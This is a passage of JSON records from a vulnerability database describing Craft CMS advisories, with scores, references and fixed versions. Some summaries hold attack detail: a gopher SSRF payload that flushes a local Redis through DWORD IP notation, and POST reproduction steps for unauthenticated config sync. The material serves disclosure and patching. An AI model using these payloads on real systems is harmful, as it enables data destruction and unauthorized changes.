,"scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-06-06T03:55:30Z/"}],"url":"https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-56145","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-56145"},{"reference_url":"https://github.com/Chocapikk/CVE-2024-56145","reference_id":"CVE-2024-56145","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Chocapikk/CVE-2024-56145"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56145","reference_id":"CVE-2024-56145","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56145"},{"reference_url":"https://github.com/advisories/GHSA-2p6p-9rc9-62j9","reference_id":"GHSA-2p6p-9rc9-62j9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2p6p-9rc9-62j9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9","reference_id":"GHSA-2p6p-9rc9-62j9","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-06-06T03:55:30Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83572?format=json","purl":"pkg:composer/craftcms/cms@5.5.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.5.2"}],"aliases":["CVE-2024-56145","GHSA-2p6p-9rc9-62j9"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c2nk-y4rx-1qf4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56174?format=json","vulnerability_id":"VCID-chep-xthg-zuee","summary":"Craft CMS Arbitrary System File Read\nBy abusing the mail notification template it is possible to read arbitrary operating system files.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52292","reference_id":"","reference_type":"","scores":[{"value":"0.00428","scoring_system":"epss","scoring_elements":"0.62805","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52292"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52292","reference_id":"CVE-2024-52292","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52292"},{"reference_url":"https://github.com/advisories/GHSA-cw6g-qmjq-6w2w","reference_id":"GHSA-cw6g-qmjq-6w2w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-cw6g-qmjq-6w2w"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-cw6g-qmjq-6w2w","reference_id":"GHSA-cw6g-qmjq-6w2w","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-13T18:52:42Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-cw6g-qmjq-6w2w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83231?format=json","purl":"pkg:composer/craftcms/cms@5.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-c2nk-y4rx-1qf4"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.4.9"}],"aliases":["CVE-2024-52292","GHSA-cw6g-qmjq-6w2w"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-chep-xthg-zuee"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50072?format=json","vulnerability_id":"VCID-cys8-jnmu-77ec","summary":"Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via Alternative IP Notation\nThe `saveAsset` GraphQL mutation uses `filter_var(..., FILTER_VALIDATE_IP)` to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25494","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05057","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25494"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d49e93e5ba0c48939ce5eaa6cd9b4a990542d8b2","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/commit/d49e93e5ba0c48939ce5eaa6cd9b4a990542d8b2"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25494","reference_id":"CVE-2026-25494","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25494"},{"reference_url":"https://github.com/advisories/GHSA-m5r2-8p9x-hp5m","reference_id":"GHSA-m5r2-8p9x-hp5m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m5r2-8p9x-hp5m"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-m5r2-8p9x-hp5m","reference_id":"GHSA-m5r2-8p9x-hp5m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-m5r2-8p9x-hp5m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25494","GHSA-m5r2-8p9x-hp5m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cys8-jnmu-77ec"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89237?format=json","vulnerability_id":"VCID-e94m-mj1k-8kbr","summary":"Server-Side Request Forgery (SSRF) in Craft CMS with Asset Uploads Mutations\n## Required Permissions\n\nThe exploitation requires a few permissions to be enabled in the used GraphQL schema:\n\n* \"Edit assets in the <VolumeName> volume\"\n* \"Create assets in the <VolumeName> volume\"\n\n## Details\n\nThe implementation fails to restrict the URL Scheme. While the application is intended to \"upload assets\", there is no whitelist forcing `http` or `https`. This allows attackers to use the Gopher protocol to wrap raw TCP commands.\n\n**Impact:** Combined with the DWORD bypass, an attacker can hit internal services without triggering any \"127.0.0.1\" string-matching filters.\n\n**Example Payload:** gopher://2130706433:6379/_FLUSHALL (Targets local Redis via DWORD).\n\n**Remediation Strategy**\n\nTo prevent mathematical IP obfuscation, the application must normalize the hostname before validation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41129","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13052","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41129"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d20aecfaa0eae076c4154be3b17e1f9fa05ce46f","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-22T17:52:52Z/"}],"url":"https://github.com/craftcms/cms/commit/d20aecfaa0eae076c4154be3b17e1f9fa05ce46f"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3m9m-24vh-39wx","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-22T17:52:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3m9m-24vh-39wx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41129","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41129"},{"reference_url":"https://github.com/advisories/GHSA-3m9m-24vh-39wx","reference_id":"GHSA-3m9m-24vh-39wx","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3m9m-24vh-39wx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110278?format=json","purl":"pkg:composer/craftcms/cms@5.9.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-asek-4gme-gug8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.15"}],"aliases":["CVE-2026-41129","GHSA-3m9m-24vh-39wx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e94m-mj1k-8kbr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91200?format=json","vulnerability_id":"VCID-eaxm-rjr7-xudb","summary":"Craft CMS: Unauthenticated Users Can Perform Restricted Project Config Sync Operations\n### Summary\nGuest users can access Config Sync updater `index`, obtain signed `data`, and execute state-changing Config Sync actions (`regenerate-yaml`, `apply-yaml-changes`) without authentication.\n\n### Details\n\n`ConfigSyncController` extends `BaseUpdaterController`, and the base updater is anonymously accessible for control panel requests.  `index` emits signed updater state (`data`), which can be reused by guests in subsequent requests.\n\nSensitive actions that are reachable via this method are `actionApplyYamlChanges`, `actionRegenerateYaml`, `applyExternalChanges`, and  `regenerateExternalConfig`.\n\n#### Reproduction steps\n\n1. Guest POST to:\n\n    http POST /admin/actions/config-sync/index\n\n  2. Extract data from returned JS state:\n\n    Craft.updater = ... setState({\"data\":\"<signedData>\", ...});\n\n  3. Reuse data as a guest:\n\n```\n  POST /admin/actions/config-sync/regenerate-yaml\n  data=<signedData>&<csrfParam>=<csrfToken>\n```\n\n  or\n\n```\n  POST /admin/actions/config-sync/apply-yaml-changes\n  data=<signedData>&<csrfParam>=<csrfToken>\n```\n\n  4. Observe completed response and state/file changes.\n\n### Impact\n\nUnauthenticated users can execute project configuration sync operations that should be restricted to trusted admin/deployment contexts.\n\nDepending on the pending YAML/config state, this can cause unauthorized config state transitions and a service integrity risk.\n\n### Resources\n\nhttps://github.com/craftcms/cms/commit/7f0ead833f7","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33159","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06623","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33159"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7f0ead833f7c2b91ae12003caad833479dd08592","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/commit/7f0ead833f7c2b91ae12003caad833479dd08592"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6mrr-q3pj-h53w","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/